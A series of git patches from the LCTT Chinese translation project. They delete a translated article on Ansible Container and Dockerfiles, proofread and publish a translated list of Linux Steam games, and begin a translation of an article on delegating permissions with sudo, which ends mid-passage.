[![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - 工程师、Hacker、演讲者、Tinker、Red Hatter。喜欢容器、linux、开源软件、python 3、rust、zsh、tmux。[More about me][9] -------------------------------------------------------------------------------- via: https://opensource.com/article/17/10/dockerfiles-ansible-container -作者:[Tomas Tomecek ][a] -译者:[译者ID](https://github.com/译者ID) +作者:[Tomas Tomecek][a] +译者:[qhwdw](https://github.com/qhwdw) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -112,3 +112,5 @@ via: https://opensource.com/article/17/10/dockerfiles-ansible-container [24]:https://opensource.com/tags/ansible [25]:https://opensource.com/tags/docker [26]:https://opensource.com/tags/open-source-summit + + From e31ce8ddd46f89f003949149a80b6997b0528cac Mon Sep 17 00:00:00 2001 From: qhwdw Date: Thu, 7 Dec 2017 12:10:15 +0800 Subject: [PATCH 0378/1627] Translated by qhwdw --- ...Linux containers with Ansible Container.md | 116 ------------------ 1 file changed, 116 deletions(-) delete mode 100644 sources/tech/20171005 How to manage Linux containers with Ansible Container.md diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md deleted file mode 100644 index 624d25694a..0000000000 --- a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md +++ /dev/null @@ -1,116 +0,0 @@ -怎么去使用 Ansible Container 去管理 Linux 容器 -============================================================ - -### Ansible Container 处理 Dockerfile 的不足和对容器化项目提供完整的管理。 - -![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") -Image by : opensource.com - -我喜欢容器,并且每天都使用这个技术。在过去几个月,在一组项目中已经解决了我遇到的问题,即便如此,容器并不完美。 - -我刚开始时,用 [Docker][11] 使用容器,因为这个项目使这个技术非常流行。除此之外,使用这个容器引擎,我学到了怎么去使用 **[docker-compose][6]** 以及怎么去用它管理我的项目。使用它使我的生产力猛增!一个命令去运行我的项目,而不管它有多复杂。因此,我太高兴了。 - -使用一段时间之后,我发现了一些问题。最明显的问题是创建窗口镜像的过程。Docker 工具使用一个定制的文件格式作为一个 Recipe 去制作容器镜像 — Dockerfiles。这个格式很容易学会,并且很短的一段时间之后,你就可以为你自己制作容器镜像了。但是,一旦你希望去掌握最佳实践或者有复杂场景的想法,问题就会出现。 - -Ansible 的更多资源 - -* [Ansible 是怎么工作的][1] - -* [免费的 Ansible 电子书][2] - -* [Ansible 快速上手视频][3] - -* [下载和安装 Ansible][4] - -让我们先休息一会儿,先去了解一个不同的东西:[Ansible][22] 的世界。你知道它吗?它棒极了,是吗?你不这么认为?好吧,是时候去学习一些新事物了。Ansible 是一个项目,它允许你通过写一些任务去管理你的基础设施,并在你选择的环境中运行它们。不需要去安装和设置任何的服务;你可以从你的笔记本电脑中去很很容易地做任何事情。许多人已经接受 Ansible 了。 - -想像一下这样的场景:你在 Ansible 中,你写了很多的 Ansible 角色和 playbooks,你可以用它们去管理你的基础设施,并且想把它们运用到容器中。你应该怎么做?开始通过 shell 脚本和 Dockerfiles 去写容器镜像定义?听起来好像不对。 - -来自 Ansible 开发团队的一些人问到这个问题,并且它们意识到,人们每天使用那些同样的 Ansible 角色和 playbooks 也可以用来制作容器镜像。但是 Ansible 能做到的不止这些 — 它可以被用于去管理容器化项目的完整的生命周期。从这些想法中,[Ansible Container][12] 项目诞生了。它使用已有的可以变成容器镜像的 Ansible 角色,甚至可以被用于应用程序在生产系统中从构建到部署的完整生命周期。 - -现在让我们讨论一下,在 Dockerfiles 环境中关于最佳实践时可能存在的问题。这里有一个警告:这将是非常具体且技术性的。出现最多的三个问题有: - -### 1\. 在 Dockerfiles 中内嵌的 Shell 脚本。 - -当写 Dockerfiles 时,你可以通过 **/bin/sh -c** 解释指定的脚本。它可以做类似这样的事情: - -``` -RUN dnf install -y nginx -``` - -RUN 处是一个 Dockerfile 指令并且其它的都是参数(它传递给 shell)。但是,想像一个更复杂的场景: - -``` -RUN set -eux; \ -    \ -# this "case" statement is generated via "update.sh" -    %%ARCH-CASE%%; \ -    \ -    url="https://golang.org/dl/go${GOLANG_VERSION}.${goRelArch}.tar.gz"; \ -    wget -O go.tgz "$url"; \ -    echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ -``` - -这仅是从 [the official golang image][13] 中拿来的一个。它看起来并不好看,是不是? - -### 2\. 你解析 Dockerfiles 并不容易。 - -Dockerfiles 是一个没有正式规范的新格式。如果你需要在你的基础设施(比如,让构建过程自动化一点)中去处理 Dockerfiles 将会很复杂。仅有的规划是 [这个代码][14],它是 **dockerd** 的一部分。问题是你不能使用它作为一个库(library)。最容易的解决方案是你自己写一个解析器,然后祈祷它运行的很好。使用一些众所周知的标记语言不是更好吗?比如,YAML 或者 JSON。 - -### 3\. 管理困难。 - -如果你熟悉容器镜像的内部结构,你可能知道每个镜像是由层(layers)构成的。一旦容器被创建,这些层就使用联合文件系统技术堆叠在一起(像煎饼一样)。问题是,你并不能显式地管理这些层 — 你不能说,“这儿开始一个新层”,你被迫使用一种可读性不好的方法去改变你的 Dockerfile。最大的问题是,必须遵循一套最佳实践以去达到最优结果 — 新来的人在这个地方可能很困难。 - -### Ansible 语言和 Dockerfiles 比较 - -相比 Ansible,Dockerfiles 的最大缺点,也是 Ansible 的优点,作为一个语言,Ansible 更强大。例如,Dockerfiles 没有直接的变量概念,而 Ansible 有一个完整的模板系统(变量只是它其中的一个特性)。Ansible 包含了很多更易于使用的模块,比如,[**wait_for**][15],它可以被用于服务就绪检查,比如,在处理之前等待服务准备就绪。在 Dockerfiles 中,做任何事情都通过一个 shell 脚本。因此,如果你想去找出已准备好的服务,它必须使用 shell(或者独立安装)去做。使用 shell 脚本的其它问题是,它会变得很复杂,维护成为一种负担。很多人已经找到了这个问题,并将这些 shell 脚本转到 Ansible。 - -如果你对这个主题感兴趣,并且想去了解更多内容,请访问 [Open Source Summit][16],在 Prague 去看 [我的演讲][17],时间是 10 月 23 日,星期一,4:20 p.m. 在 Palmovka room 中。 - - _看更多的 Tomas Tomecek 演讲,[从 Dockerfiles 到 Ansible Container][7],在 [Open Source Summit EU][8],它将在 10 月 23-26 日在 Prague 召开。_ - - - -### 关于作者 - - [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - 工程师、Hacker、演讲者、Tinker、Red Hatter。喜欢容器、linux、开源软件、python 3、rust、zsh、tmux。[More about me][9] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/10/dockerfiles-ansible-container - -作者:[Tomas Tomecek][a] -译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/tomastomecek -[1]:https://www.ansible.com/how-ansible-works?intcmp=701f2000000h4RcAAI -[2]:https://www.ansible.com/ebooks?intcmp=701f2000000h4RcAAI -[3]:https://www.ansible.com/quick-start-video?intcmp=701f2000000h4RcAAI -[4]:https://docs.ansible.com/ansible/latest/intro_installation.html?intcmp=701f2000000h4RcAAI -[5]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201&rate=Wiw_0D6PK_CAjqatYu_YQH0t1sNHEF6q09_9u3sYkCY -[6]:https://github.com/docker/compose -[7]:http://sched.co/BxIW -[8]:http://events.linuxfoundation.org/events/open-source-summit-europe -[9]:https://opensource.com/users/tomastomecek -[10]:https://opensource.com/user/175651/feed -[11]:https://opensource.com/tags/docker -[12]:https://www.ansible.com/ansible-container -[13]:https://github.com/docker-library/golang/blob/master/Dockerfile-debian.template#L14 -[14]:https://github.com/moby/moby/tree/master/builder/dockerfile -[15]:http://docs.ansible.com/wait_for_module.html -[16]:http://events.linuxfoundation.org/events/open-source-summit-europe -[17]:http://events.linuxfoundation.org/events/open-source-summit-europe/program/schedule -[18]:https://opensource.com/users/tomastomecek -[19]:https://opensource.com/users/tomastomecek -[20]:https://opensource.com/users/tomastomecek -[21]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201#comments -[22]:https://opensource.com/tags/ansible -[23]:https://opensource.com/tags/containers -[24]:https://opensource.com/tags/ansible -[25]:https://opensource.com/tags/docker -[26]:https://opensource.com/tags/open-source-summit - - From b416b110fbb92f3599ded2d4743cec220accc8a8 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 7 Dec 2017 12:56:18 +0800 Subject: [PATCH 0379/1627] PRF:20171204 30 Best Linux Games On Steam You Should Play in 2017.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yixunx 翻译的很棒! --- ... Games On Steam You Should Play in 2017.md | 152 +++++++++--------- 1 file changed, 73 insertions(+), 79 deletions(-) diff --git a/translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md index f9fadae4ec..0588e1f88c 100644 --- a/translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md +++ b/translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md @@ -1,11 +1,11 @@ -2017 年最好的 30 款支持 Linux 的 Steam 游戏 +2017 年 30 款最好的支持 Linux 的 Steam 游戏 ============================================================ -说到游戏,人们一般都会推荐使用 Windows 系统。Windows 能提供更好的显卡支持和硬件兼容性,所以对于游戏爱好者来说的确是个更好的选择。但你是否想过[在 Linux 系统上玩游戏][9]?这的确是可能的,也许你以前还曾经考虑过。但在几年之前, [Steam for Linux][10] 上可玩的游戏并不是很吸引人。 +说到游戏,人们一般都会推荐使用 Windows 系统。Windows 能提供更好的显卡支持和硬件兼容性,所以对于游戏爱好者来说的确是个更好的选择。但你是否想过[在 Linux 系统上玩游戏][9]?这的确是可以的,也许你以前还曾经考虑过。但在几年之前, [Steam for Linux][10] 上可玩的游戏并不是很吸引人。 但现在情况完全不一样了。Steam 商店里现在有许多支持 Linux 平台的游戏(包括很多主流大作)。我们在本文中将介绍 Steam 上最好的一些 Linux 游戏。 -在进入正题之前,先介绍一个省钱小窍门。如果你是个狂热的游戏爱好者,在游戏上花费很多时间和金钱的话,我建议你订阅 [Humble 每月包(Humble Monthly)][11]。这是个每月收费的订阅服务,每月只用 12 美元就能获得价值 100 美元的游戏。 +在进入正题之前,先介绍一个省钱小窍门。如果你是个狂热的游戏爱好者,在游戏上花费很多时间和金钱的话,我建议你订阅 [Humble 每月包Humble Monthly][11]。这是个每月收费的订阅服务,每月只用 12 美元就能获得价值 100 美元的游戏。 这个游戏包中可能有些游戏不支持 Linux,但除了 Steam 游戏之外,它还会让 [Humble Bundle 网站][12]上所有的游戏和书籍都打九折,所以这依然是个不错的优惠。 @@ -20,218 +20,212 @@ 可以点击以下链接跳转到你喜欢的游戏类型: * [动作类游戏][3] - * [角色扮演类游戏][4] - * [赛车/运动/模拟类游戏][5] - * [冒险类游戏][6] - * [独立游戏][7] - * [策略类游戏][8] ### Steam 上最佳 Linux 动作类游戏 -### 1\. 反恐精英:全球攻势(Counter-Strike: Global Offensive)(多人) +#### 1、 《反恐精英:全球攻势Counter-Strike: Global Offensive》(多人) 《CS:GO》毫无疑问是 Steam 上支持 Linux 的最好的 FPS 游戏之一。我觉得这款游戏无需介绍,但如果你没有听说过它,我要告诉你这将会是你玩过的最好玩的多人 FPS 游戏之一。《CS:GO》还是电子竞技中的一个主流项目。想要提升等级的话,你需要在天梯上和其他玩家同台竞技。但你也可以选择更加轻松的休闲模式。 我本想写《彩虹六号:围攻行动》,但它目前还不支持 Linux 或 Steam OS。 -[购买《CS: GO》][15] +- [购买《CS: GO》][15] -### 2\. 求生之路 2(多人/单机) +#### 2、 《求生之路 2Left 4 Dead 2》(多人/单机) -这是最受欢迎的僵尸主题多人 FPS 游戏之一。在 Steam 优惠时,价格可以低至 1.3 美元。这是个有趣的游戏,能让你体会到你在僵尸游戏中期待的寒意和紧张感。游戏中的环境包括了沼泽、城市、墓地等等,让游戏既有趣又吓人。游戏中的枪械并不是非常先进,但作为一个老游戏来说,它已经提供了足够真实的体验。 +这是最受欢迎的僵尸主题多人 FPS 游戏之一。在 Steam 优惠时,价格可以低至 1.3 美元。这是个有趣的游戏,能让你体会到你在僵尸游戏中期待的战栗和刺激。游戏中的环境包括了沼泽、城市、墓地等等,让游戏既有趣又吓人。游戏中的枪械并不是非常先进,但作为一个老游戏来说,它已经提供了足够真实的体验。 -[购买《求生之路 2》][16] +- [购买《求生之路 2》][16] -### 3\. 无主之地 2(Borderlands 2)(单机/协作) +#### 3、 《无主之地 2Borderlands 2》(单机/协作) -《无主之地 2》是个很有意思的 FPS 游戏。它和你以前玩过的游戏完全不同。画风看上去有些诡异和卡通化,但我可以保证,游戏体验可一点也不逊色! +《无主之地 2》是个很有意思的 FPS 游戏。它和你以前玩过的游戏完全不同。画风看上去有些诡异和卡通化,如果你正在寻找一个第一视角的射击游戏,我可以保证,游戏体验可一点也不逊色! 如果你在寻找一个好玩而且有很多 DLC 的 Linux 游戏,《无主之地 2》绝对是个不错的选择。 -[购买《无主之地 2》][17] +- [购买《无主之地 2》][17] -### 4\. 叛乱(Insurgency)(多人) +#### 4、 《叛乱Insurgency》(多人) 《叛乱》是 Steam 上又一款支持 Linux 的优秀的 FPS 游戏。它剑走偏锋,从屏幕上去掉了 HUD 和弹药数量指示。如同许多评论者所说,这是款注重武器和团队战术的纯粹的射击游戏。这也许不是最好的 FPS 游戏,但如果你想玩和《三角洲部队》类似的多人游戏的话,这绝对是最好的游戏之一。 -[购买《叛乱》][18] +- [购买《叛乱》][18] -### 5\. 生化奇兵:无限(Bioshock: Infinite)(单机) +#### 5、 《生化奇兵:无限Bioshock: Infinite》(单机) 《生化奇兵:无限》毫无疑问将会作为 PC 平台最好的单机 FPS 游戏之一而载入史册。你可以利用很多强大的能力来杀死你的敌人。同时你的敌人也各个身怀绝技。游戏的剧情也非常丰富。你不容错过! -[购买《生化奇兵:无限》][19] +- [购买《生化奇兵:无限》][19] -### 6\. 《杀手(年度版)》(HITMAN - Game of the Year Edition)(单机) +#### 6、 《杀手(年度版)HITMAN - Game of the Year Edition》(单机) 《杀手》系列无疑是 PC 游戏爱好者们的最爱之一。本系列的最新作开始按章节发布,让很多玩家觉得不满。但现在 Square Enix 撤出了开发,而最新的年度版带着新的内容重返舞台。在游戏中发挥你的想象力暗杀你的目标吧,杀手47! -[购买(杀手(年度版))][20] +- [购买(杀手(年度版))][20] -### 7\. 传送门 2 +#### 7、 《传送门 2Portal 2》 《传送门 2》完美地结合了动作与冒险。这是款解谜类游戏,你可以与其他玩家协作,并开发有趣的谜题。协作模式提供了和单机模式截然不同的游戏内容。 -[购买《传送门2》][21] +- [购买《传送门2》][21] -### 8\. 杀出重围:人类分裂 +#### 8、 《杀出重围:人类分裂Deux Ex: Mankind Divided》 -如果你在寻找隐蔽类的射击游戏,《杀出重围》是个完美的选择。这是个非常华丽的游戏,有着最先进的武器和超乎寻常的战斗机制。 +如果你在寻找隐蔽类的射击游戏,《杀出重围》是个填充你的 Steam 游戏库的完美选择。这是个非常华丽的游戏,有着最先进的武器和超乎寻常的战斗机制。 -[购买《杀出重围:人类分裂》][22] +- [购买《杀出重围:人类分裂》][22] -### 9\. 地铁 2033 重置版(Metro 2033 Redux) / 地铁:最后曙光 重置版(Metro Last Light Redux) +#### 9、 《地铁 2033 重置版Metro 2033 Redux》 / 《地铁:最后曙光 重置版Metro Last Light Redux》 《地铁 2033 重置版》和《地铁:最后曙光 重置版》是经典的《地铁 2033》和《地铁:最后曙光》的最终版本。故事发生在世界末日之后。你需要消灭所有的变种人来保证人类的生存。剩下的就交给你自己去探索了! -[购买《地铁 2033 重置版》][23] +- [购买《地铁 2033 重置版》][23] +- [购买《地铁:最后曙光 重置版》][24] -[购买《地铁:最后曙光 重置版》][24] - -### 10\. 坦能堡(Tannenberg)(多人) +#### 10、 《坦能堡Tannenberg》(多人) 《坦能堡》是个全新的游戏 - 在本文发表一个月前刚刚发售。游戏背景是第一次世界大战的东线战场(1914-1918)。这款游戏只有多人模式。如果你想要在游戏中体验第一次世界大战,不要错过这款游戏! -[购买《坦能堡》][25] +- [购买《坦能堡》][25] ### Steam 上最佳 Linux 角色扮演类游戏 -### 11\. 中土世界:暗影魔多(Shadow of Mordor) +#### 11、 《中土世界:暗影魔多Shadow of Mordor》 《中土世界:暗影魔多》 是 Steam 上支持 Linux 的最好的开放式角色扮演类游戏之一。你将扮演一个游侠(塔里昂),和光明领主(凯勒布理鹏)并肩作战击败索隆的军队(并最终和他直接交手)。战斗机制非常出色。这是款不得不玩的游戏! -[购买《中土世界:暗影魔多》][26] +- [购买《中土世界:暗影魔多》][26] -### 12\. 神界:原罪加强版(Divinity: Original Sin – Enhanced Edition) +#### 12、 《神界:原罪加强版Divinity: Original Sin – Enhanced Edition》 《神界:原罪》是一款极其优秀的角色扮演类独立游戏。它非常独特而又引人入胜。这或许是评分最高的带有冒险和策略元素的角色扮演游戏。加强版添加了新的游戏模式,并且完全重做了配音、手柄支持、协作任务等等。 -[购买《神界:原罪加强版》][27] +- [购买《神界:原罪加强版》][27] -### 13\. 废土 2:导演剪辑版(Wasteland 2: Director’s Cut) +#### 13、 《废土 2:导演剪辑版Wasteland 2: Director’s Cut》 《废土 2》是一款出色的 CRPG 游戏。如果《辐射 4》被移植成 CRPG 游戏,大概就是这种感觉。导演剪辑版完全重做了画面,并且增加了一百多名新人物。 -[购买《废土 2》][28] +- [购买《废土 2》][28] -### 14\. 阴暗森林(Darkwood) +#### 14、 《阴暗森林Darkwood》 一个充满恐怖的俯视角角色扮演类游戏。你将探索世界、搜集材料、制作武器来生存下去。 -[购买《阴暗森林》][29] +- [购买《阴暗森林》][29] ### 最佳赛车 / 运动 / 模拟类游戏 -### 15\. 火箭联盟(Rocket League) +#### 15、 《火箭联盟Rocket League》 《火箭联盟》是一款充满刺激的足球游戏。游戏中你将驾驶用火箭助推的战斗赛车。你不仅是要驾车把球带进对方球门,你甚至还可以让你的对手化为灰烬! 这是款超棒的体育动作类游戏,每个游戏爱好者都值得拥有! -[购买《火箭联盟》][30] +- [购买《火箭联盟》][30] -### 16\. 公路救赎(Road Redemption) +#### 16、 《公路救赎Road Redemption》 想念《暴力摩托》了?作为它精神上的续作,《公路救赎》可以缓解你的饥渴。当然,这并不是真正的《暴力摩托 2》,但它一样有趣。如果你喜欢《暴力摩托》,你也会喜欢这款游戏。 -[购买《公路救赎》][31] +- [购买《公路救赎》][31] -### 17\. 尘埃拉力赛(Dirt Rally) +#### 17、 《尘埃拉力赛Dirt Rally》 《尘埃拉力赛》是为想要体验公路和越野赛车的玩家准备的。画面非常有魄力,驾驶手感也近乎完美。 -[购买《尘埃拉力赛》][32] +- [购买《尘埃拉力赛》][32] -### 18\. F1 2017 +#### 18、 《F1 2017》 《F1 2017》是另一款令人印象深刻的赛车游戏。由《尘埃拉力赛》的开发者 Codemasters & Feral Interactive 制作。游戏中包含了所有标志性的 F1 赛车,值得你去体验。 -[购买《F1 2017》][33] +- [购买《F1 2017》][33] -### 19. 超级房车赛:汽车运动(GRID Autosport) +#### 19、 《超级房车赛:汽车运动GRID Autosport》 《超级房车赛》是最被低估的赛车游戏之一。《超级房车赛:汽车运动》是《超级房车赛》的续作。这款游戏的可玩性令人惊艳。游戏中的赛车也比前作更好。推荐所有的 PC 游戏玩家尝试这款赛车游戏。游戏还支持多人模式,你可以和你的朋友组队参赛。 -[购买《超级房车赛:汽车运动》][34] +- [购买《超级房车赛:汽车运动》][34] ### 最好的冒险游戏 -### 20\. 方舟:生存进化(ARK: Survival Evolved) +#### 20、 《方舟:生存进化ARK: Survival Evolved》 《方舟:生存进化》是一款不错的生存游戏,里面有着激动人心的冒险。你发现自己身处一个未知孤岛(方舟岛),为了生存下去并逃离这个孤岛,你必须去驯服恐龙、与其他玩家合作、猎杀其他人来抢夺资源、以及制作物品。 -[购买《方舟:生存进化》][35] +- [购买《方舟:生存进化》][35] -### 21\. 这是我的战争(This War of Mine) +#### 21、 《这是我的战争This War of Mine》 一款独特的战争游戏。你不是扮演士兵,而是要作为一个平民来面对战争带来的艰难。你需要在身经百战的敌人手下逃生,并帮助其他的幸存者。 -[购买《这是我的战争》][36] +- [购买《这是我的战争》][36] -### 22\. 疯狂的麦克斯(Mad Max) +#### 22、 《疯狂的麦克斯Mad Max》 生存和暴力概括了《疯狂的麦克斯》的全部内容。游戏中有性能强大的汽车,开放性的世界,各种武器,以及徒手肉搏。你要不断地探索世界,并注意升级你的汽车来防患于未然。在做决定之前,你要仔细思考并设计好策略。 -[购买《疯狂的麦克斯》][37] +- [购买《疯狂的麦克斯》][37] ### 最佳独立游戏 -### 23\. 泰拉瑞亚(Terraria) +#### 23、 《泰拉瑞亚Terraria》 -这是款在 Steam 上广受好评的 2D 游戏。你在旅途中需要去挖掘、战斗、探索、建造。游戏地图是自动生成的,而不是静止的。也许你刚刚遇到的东西,你的朋友过一会儿才会遇到。你还将体验到富有新意的 2D 动作场景。 +这是款在 Steam 上广受好评的 2D 游戏。你在旅途中需要去挖掘、战斗、探索、建造。游戏地图是自动生成的,而不是固定不变的。也许你刚刚遇到的东西,你的朋友过一会儿才会遇到。你还将体验到富有新意的 2D 动作场景。 -[购买《泰拉瑞亚》][38] +- [购买《泰拉瑞亚》][38] -### 24\. 王国与城堡(Kingdoms and Castles) +#### 24、 《王国与城堡Kingdoms and Castles》 在《王国与城堡》中,你将建造你自己的王国。在管理你的王国的过程中,你需要收税、保护森林、规划城市,并且发展国防来防止别人入侵你的王国。 这是款比较新的游戏,但在独立游戏中已经相对获得了比较高的人气。 -[购买《王国与城堡》][39] +- [购买《王国与城堡》][39] ### Steam 上最佳 Linux 策略类游戏 -### 25\. 文明 5(Sid Meier’s Civilization V) +#### 25、 《文明 5Sid Meier’s Civilization V》 《文明 5》是 PC 上评价最高的策略游戏之一。如果你想的话,你可以去玩《文明 6》。但是依然有许多玩家喜欢《文明 5》,觉得它更有独创性,游戏细节也更富有创造力。 -[购买《文明 5》][40] +- [购买《文明 5》][40] -### 26\. 全面战争:战锤(Total War: Warhammer) +#### 26、 《全面战争:战锤Total War: Warhammer》 -《全面战争:战锤》是 PC 平台上一款非常出色的回合制策略游戏。可惜的是,新作《战锤 2》依然不支持Linux。但如果你喜欢使用飞龙和魔法来建造与毁灭帝国的话,2016 年的《战锤》依然是个不错的选择。 +《全面战争:战锤》是 PC 平台上一款非常出色的回合制策略游戏。可惜的是,新作《战锤 2》依然不支持 Linux。但如果你喜欢使用飞龙和魔法来建造与毁灭帝国的话,2016 年的《战锤》依然是个不错的选择。 -[购买《全面战争:战锤》][41] +- [购买《全面战争:战锤》][41] -### 27\. 轰炸小队《Bomber Crew》 +#### 27、 《轰炸小队Bomber Crew》 想要一款充满乐趣的策略游戏?《轰炸小队》就是为你准备的。你需要选择合适的队员并且让你的队伍稳定运转来取得最终的胜利。 -[购买《轰炸小队》][42] +- [购买《轰炸小队》][42] -### 28\. 奇迹时代 3(Age of Wonders III) +#### 28、 《奇迹时代 3Age of Wonders III》 非常流行的策略游戏,包含帝国建造、角色扮演、以及战争元素。这是款精致的回合制策略游戏,请一定要试试! -[购买《奇迹时代 3》][43] +- [购买《奇迹时代 3》][43] -### 29\. 城市:天际线(Cities: Skylines) +#### 29、 《城市:天际线Cities: Skylines》 -一款非常简洁的游戏。你要从零开始建造一座城市,并且管理它的全部运作。你将体验建造和管理城市带来的愉悦与困难。我不觉得每个玩家都会喜欢这款游戏——它的用户群体非常明确。 +一款非常简洁的策略游戏。你要从零开始建造一座城市,并且管理它的全部运作。你将体验建造和管理城市带来的愉悦与困难。我不觉得每个玩家都会喜欢这款游戏——它的用户群体非常明确。 -[购买《城市:天际线》][44] +- [购买《城市:天际线》][44] -### 30\. 幽浮 2(XCOM 2) +#### 30、 《幽浮 2XCOM 2》 -《幽浮 2》是 PC 上最好的回合制策略游戏之一。我在想如果《幽浮 2》能够被制作成 FPS 游戏的话该有多棒。不过它现在已经是一款好评如潮的杰作了。如果你有多余的预算能花在这款游戏上,建议你购买“天选之战(War of the Chosen)“ DLC。 +《幽浮 2》是 PC 上最好的回合制策略游戏之一。我在想如果《幽浮 2》能够被制作成 FPS 游戏的话该有多棒。不过它现在已经是一款好评如潮的杰作了。如果你有多余的预算能花在这款游戏上,建议你购买“天选之战War of the Chosen“ DLC。 -[购买《幽浮 2》][45] +- [购买《幽浮 2》][45] ### 总结 @@ -247,7 +241,7 @@ via: https://itsfoss.com/best-linux-games-steam/ 作者:[Ankush Das][a] 译者:[yixunx](https://github.com/yixunx) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -260,7 +254,7 @@ via: https://itsfoss.com/best-linux-games-steam/ [6]:https://itsfoss.com/best-linux-games-steam/#adv [7]:https://itsfoss.com/best-linux-games-steam/#indie [8]:https://itsfoss.com/best-linux-games-steam/#strategy -[9]:https://itsfoss.com/linux-gaming-guide/ +[9]:https://linux.cn/article-7316-1.html [10]:https://itsfoss.com/install-steam-ubuntu-linux/ [11]:https://www.humblebundle.com/?partner=itsfoss [12]:https://www.humblebundle.com/store?partner=itsfoss From 10f3feb64991c0ceeece73b048672c712e027020 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 7 Dec 2017 12:57:05 +0800 Subject: [PATCH 0380/1627] PUB:20171204 30 Best Linux Games On Steam You Should Play in 2017.md @yixunx https://linux.cn/article-9120-1.html --- ...171204 30 Best Linux Games On Steam You Should Play in 2017.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171204 30 Best Linux Games On Steam You Should Play in 2017.md (100%) diff --git a/translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/published/20171204 30 Best Linux Games On Steam You Should Play in 2017.md similarity index 100% rename from translated/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md rename to published/20171204 30 Best Linux Games On Steam You Should Play in 2017.md From 94241be9d25d7a55a406798877481977fd8b5345 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 15:59:31 +0800 Subject: [PATCH 0381/1627] translated --- ...g sudo to delegate permissions in Linux.md | 150 +++++++++--------- 1 file changed, 75 insertions(+), 75 deletions(-) diff --git a/sources/tech/20171205 Using sudo to delegate permissions in Linux.md b/sources/tech/20171205 Using sudo to delegate permissions in Linux.md index 46a807c7a4..0f24ae5a90 100644 --- a/sources/tech/20171205 Using sudo to delegate permissions in Linux.md +++ b/sources/tech/20171205 Using sudo to delegate permissions in Linux.md @@ -1,92 +1,91 @@ -translating by lujun9972 -Using sudo to delegate permissions in Linux +Linux下使用sudo进行赋权 ====== -I recently wrote a short Bash program to copy MP3 files from a USB thumb drive on one network host to another network host. The files are copied to a specific directory on the server that I run for a volunteer organization, from where the files can be downloaded and played. +我最近写了一个简短的 Bash 程序来将 MP3 文件从一台网络主机的 UBS 盘中拷贝到另一台网络主机上去。拷贝出来的文件存放在一台志愿者组织所属服务器的特定目录下, 在那里,这些文件可以被下载和播放。 -My program does a few other things, such as changing the name of the files before they are copied so they are automatically sorted by date on the webpage. It also deletes all the files on the USB drive after verifying that the transfer completed correctly. This nice little program has a few options, such as -h to display help, -t for test mode, and a couple of others. +我的程序还会做些其他事情,比如为了自动在网页上根据日期排序,在拷贝文件之前会先对这些文件重命名。 在验证拷贝完成后,还会删掉 USB 盘中的所有文件。 这个小程序还有一些其他选项,比如 `-h` 会显示帮助, `-t` 进入测试模式等等。 -My program, as wonderful as it is, must run as root to perform its primary functions. Unfortunately, this organization has only a few people who have any interest in administering our audio and computer systems, which puts me in the position of finding semi-technical people and training them to log into the computer used to perform the transfer and run this little program. +我的程序需要以 root 运行才能发挥作用。然而, 这个组织中之后很少的人对管理音频和计算机系统有兴趣的,这使得我不得不找那些半吊子的科技人员来,并培训他们登陆用于传输的计算机,运行这个小程序。 -It is not that I cannot run the program myself, but for various reasons, including travel and illness, I am not always there. Even when I am present, as the "lazy sysadmin," I like to have others do my work for me. So, I write scripts to automate those tasks and use sudo to anoint a couple of users to run the scripts. Many Linux commands require the user to be root in order to run. This protects the system against accidental damage, such as that caused by my own stupidity, and intentional damage by a user with malicious intent. +倒不是说我不能亲自运行这个程序,但由于外出和疾病等等各种原因, 我不是时常在场的。 即使我在场, 作为一名 "懒惰的系统管理员", 我也希望别人能替我把事情给做了。 因此我写了一些脚本来自动完成这些人物并通过 sudo 来指定某些人来运行这些脚本。 很多 Linux 命令都需要用户以 root 身份来运行。 sudo 能够保护系统免遭一时糊涂造成的意外损坏以及恶意用户的故意破坏。 ### Do that sudo that you do so well -The sudo program is a handy tool that allows me as a sysadmin with root access to delegate responsibility for all or a few administrative tasks to other users of the computer. It allows me to perform that delegation without compromising the root password, thus maintaining a high level of security on the host. +sudo 是一个很方便的工具,它让我一个 root 管理员可以分配所有或者部分管理性的任务给其他用户, 而且还无需告诉他们 root 密码, 从而保证主机的高安全性。 -Let's assume, for example, that I have given regular user, "ruser," access to my Bash program, "myprog," which must be run as root to perform parts of its functions. First, the user logs in as ruser with their own password, then uses the following command to run myprog. +假设,我给了普通用户 "ruser" 访问我 Bash 程序 "myprog" 的权限, 而这个程序的部分功能需要 root 